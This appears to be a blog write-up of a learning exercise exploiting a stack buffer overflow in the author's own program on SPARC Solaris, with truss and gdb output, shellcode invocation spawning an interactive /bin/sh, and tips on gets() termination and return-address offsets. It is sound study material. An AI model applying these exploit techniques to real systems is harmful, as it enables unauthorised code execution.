read(3, 0xFFBEF710, 128)                        = 0
close(3)                                        = 0
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670)  = 0
sigaction(SIGINT, 0xFFBEF538, 0xFFBEF5B8)       = 0
sigaction(SIGINT, 0xFFBEF4C8, 0xFFBEF548)       = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " p r o g = $ ( / h o m e".., 718)    = 413
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF4D0)  = 0
getcontext(0xFFBEF2A0)
pipe()                                          = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488)  = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF494, 0xFFBEF484)  = 0
llseek(255, 0xFFFFFFFFFFFFFE89, SEEK_CUR)       = 343
fork()                                          = 2100
sigprocmask(SIG_SETMASK, 0xFFBEF484, 0x00000000) = 0
    Received signal #18, SIGCLD [caught]
      siginfo: SIGCLD CLD_EXITED pid=2100 status=0x0000
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF168)
sigaction(SIGCLD, 0xFFBEF3E8, 0xFFBEF468)       = 0
close(4)                                        = 0
read(3, " / h o m e / b a z z / l".., 128)      = 20
read(3, 0xFFBEF528, 128)                        = 0
close(3)                                        = 0
sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488)  = 0
sigaction(SIGINT, 0xFFBEF350, 0xFFBEF3D0)       = 0
sigaction(SIGINT, 0xFFBEF2E0, 0xFFBEF360)       = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " s h i f t\n i f   [   -".., 718)    = 375
getcontext(0xFFBEFA08)
getcontext(0xFFBEF4E0)
getcontext(0xFFBEF4E0)
setcontext(0xFFBEF4E0)
sigaction(SIGINT, 0xFFBEF5E0, 0xFFBEF660)       = 0
sigaction(SIGQUIT, 0xFFBEF5E0, 0xFFBEF660)      = 0
sigaction(SIGCLD, 0xFFBEF5E0, 0xFFBEF660)       = 0
execve("/home/bazz/bin/env", 0x001132C8, 0x0010F908)  argc = 5
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/tools/gcc-3.4.2/lib/libc.so.1", 0xFFBEF638) Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF638)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x10B0A4E0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF638)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1018CDC8, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF350) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3)                                        = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192)                        = 0
brk(0x000310C8)                                 = 0
brk(0x000330C8)                                 = 0
getuid()                                        = 100 [100]
getuid()                                        = 100 [100]
execve("/home/bazz/latest/v", 0xFFBEFD64, 0x000314E0)  argc = 1
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF7F0)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x127A87A0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF7F0)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x127A4538, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF508) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3)                                        = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192)                        = 0
sp = 0xwrite(2, " s p   =   0 x", 7)                    = 7
ffbefdb8write(2, " f f b e f d b 8", 8)                 = 8

write(2, "\n", 1)                               = 1
ioctl(0, TCGETA, 0xFFBEFB54)                    Err#25 ENOTTY
fstat64(0, 0xFFBEFBC8)                          = 0
brk(0x00020B00)                                 = 0
brk(0x00024B00)                                 = 0
read(0, "01 A A A01 B B B01 C C C".., 8192)     = 421
read(0, 0x00020B0C, 8192)                       = 0
execve("/bin/sh", 0xFFBEFEB0, 0x00000000)  argc = 2
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libgen.so.1", 0xFFBEF828)        = 0
resolvepath("/usr/lib/libgen.so.1", "/usr/lib/libgen.so.1", 1023) = 20
open("/usr/lib/libgen.so.1", O_RDONLY)          = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x0393CD50, 98304, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 23073, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
mmap(0xFF386000, 2335, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 24576) = 0xFF386000
munmap(0xFF376000, 65536)                       = 0
memcntl(0xFF370000, 6932, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libc.so.1", 0xFFBEF828)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x13ABB888, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF828)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1312EF40, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF360000
mmap(0xFF360000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF360000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF540) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF350000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF270000
mmap(0xFF270000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF270000
close(3)                                        = 0
munmap(0xFF390000, 8192)                        = 0
getpid()                                        = 2098 [2097]
getpgid(2098)                                   = 2097
getsid(2098)                                    = 1819
brk(0x0003A108)                                 = 0
sysconfig(_CONFIG_SIGRT_MIN)                    = 38
sysconfig(_CONFIG_SIGRT_MAX)                    = 45
sigaltstack(0xFFBEFE5C, 0x00000000)             = 0
sigaction(SIGHUP, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGHUP, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGINT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGINT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGQUIT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGQUIT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGILL, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGILL, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGTRAP, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTRAP, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGABRT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGABRT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGEMT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGEMT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGFPE, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGFPE, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGBUS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGBUS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGSEGV, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGSYS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGSYS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPIPE, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPIPE, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGALRM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGALRM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGTERM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTERM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR1, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR1, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR2, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR2, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGPWR, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGPWR, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGURG, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGURG, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPOLL, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPOLL, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGVTALRM, 0x00000000, 0xFFBEFDD8)    = 0
sigaction(SIGVTALRM, 0xFFBEFD38, 0xFFBEFDB8)    = 0
sigaction(SIGPROF, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPROF, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGXCPU, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGXFSZ, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGRTMIN, 0xFFBEFD38, 0xFFBEFDB8)     = 0
sigaction(SIGRTMIN+1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX, 0xFFBEFD38, 0xFFBEFDB8)     = 0
getuid()                                        = 100 [100]
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getgid()                                        = 10 [10]
getuid()                                        = 100 [100]
ioctl(0, TCGETS, 0x000391B0)                    Err#25 ENOTTY
$ write(2, " $  ", 2)                           = 2
read(0, 0x000394D0, 128)                        = 0
fcntl(0, F_GETFL, 0x00000000)                   = 8192
fstat64(0, 0xFFBEFC28)                          = 0
ioctl(0, TCGETA, 0xFFBEFD7C)                    Err#25 ENOTTY
close(0)                                        = 0
llseek(0, 0, SEEK_CUR)                          Err#9 EBADF
_exit(0)
-bash-4.3$

I finally start to put 2 and 2 together…

$PWD/invoke2 v < payload

The above invocation was the problem.. Since stdin was redirected from the file, the payload had already been consumed by the time the shell was spawned, so the shell read EOF on stdin and exited immediately (that is the `read(0, ...) = 0` followed by `_exit(0)` at the end of the truss output above) — it’s just like “I GUESS IM FINISHED HERE.. EOF”..

Here’s my temporary happiness inspired from http://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe
Here’s a temporary solution

    without

the beauty of a raw tty (you may have to hit enter once at the beginning and again after doing an ‘exit’):

Notes
The difference between invoking /bin/sh -i and plain /bin/bash is that -i automatically adds the $ prompt. I could not find a way to set the prompt manually when using /bin/sh through cat without -i.

Here’s an example of the exploit running; it does an execve of /bin/sh -i

# anything enclosed in [] is note from me added after execution

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ (cat payload; cat) | $PWD/invoke2 v
sp = 0xffbefdb8
[hangs here until you hit enter key, probably an incident of using cat and cooked input]
$ ls
alternating_payload2       asmshell2.bin              exec                       payload3                   v2
alternating_payload2.c     asmshell3.bin              howto_a_payload            payload_asmshell6          v2.c
alternating_payload3       asmshell4.bin              invoke2                    payload_fix_fp             write_raw.bin
alternating_payload3.c     asmshell5_interactive.bin  ksh_shellcode              payload_trashed_fp
asm                        asmshell6.bin              magic_crash_length         readme.txt
asm_tcsh.bin               build_shellcode_steps      payload                    v
asmshell.bin               core                       payload2                   v.c
$ exit
[hangs here until you hit enter key again, probably an incident of using cat and cooked input]
-bash-4.3$

Figure out how much space there is until overflow into Libc (that’s bad)

(gdb) q
-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload2 1024 >> payload; printf "\x00" >> payload
-bash-4.3$ $PWD/invoke2 -d v
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(gdb) b 16
Breakpoint 1 at 0x10750: file v.c, line 16.
(gdb) r < payload
Starting program: /home/bazz/latest/v < payload
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
sp = 0xffbefda0

Program received signal SIGSEGV, Segmentation fault.
0xff2c3064 in memccpy () from /usr/lib/libc.so.1
(gdb)

The only logical explanation is that the buffer needs to be shortened. It must be overwriting libc, or some SUPER out-of-bounds area… maybe it went completely off the charts.. IONNO, I try to understand it but it isn’t working, so I just cut the buffer down. Actually, I just learned, using pmap and trialing the buffer size, that the stack is allocated as 8K read/write/exec starting at FFBEE000 [ stack ]
FFBEE000 + 8k (0x2000) = 0xFFBF0000
which is past the page boundary, so anything written at or beyond 0xFFBF0000 lands in unmapped memory — that is the “Cannot access memory at address 0xffbf0000” gdb shows below, and the reason the copy faults inside libc (the SIGSEGV in memccpy above).

(gdb)
0xffbeff80:     0x03424242      0x03434343      0x03444444      0x03454545
0xffbeff90:     0x03464646      0x03474747      0x03484848      0x03494949
0xffbeffa0:     0x034a4a4a      0x034b4b4b      0x034c4c4c      0x034d4d4d
0xffbeffb0:     0x034e4e4e      0x034f4f4f      0x03505050      0x03515151
0xffbeffc0:     0x03525252      0x03535353      0x03545454      0x03555555
0xffbeffd0:     0x03565656      0x03575757      0x03585858      0x03595959
0xffbeffe0:     0x035a5a5a      0x04414141      0x04424242      0x04434343
0xffbefff0:     0x04444444      0x04454545
(gdb)
0xffbefff8:     0x04464646      0x04470000      Cannot access memory at address 0xffbf0000
(gdb)

NOTE!! When exploiting gets(), it is IMPERATIVE to use a 0x0a rather than a null byte; the newline plays the leading role in string termination.. I didn’t do that above and it led to hairy things.. I had to hit enter myself, causing a \r\n, which is why the last 2 bytes are 0000 — that was the space needed for the \r\n, I assume.. you can get rid of this by using 0x0a in your buffer.

in the scheme of exploiting apply, the program can be spawned an unlimited number of times.

To get really sweet, it’s time to open our own TTY to “write” our shellcode through and eventually our own terminal to directly operate with the shell on the other end :)

    Notes On my blade 150

0x18-byte difference between the debug and production return address offsets. This difference does not exist on the school production servers.
i.e.
e50 # debug return address – 8
e68 # production return address – 8

To-Do:
Add in a sweet nop-slide
Then find a suitable backoff limit, and fill with nops

Posted in Bash, buffer overflow, Sparc/Solaris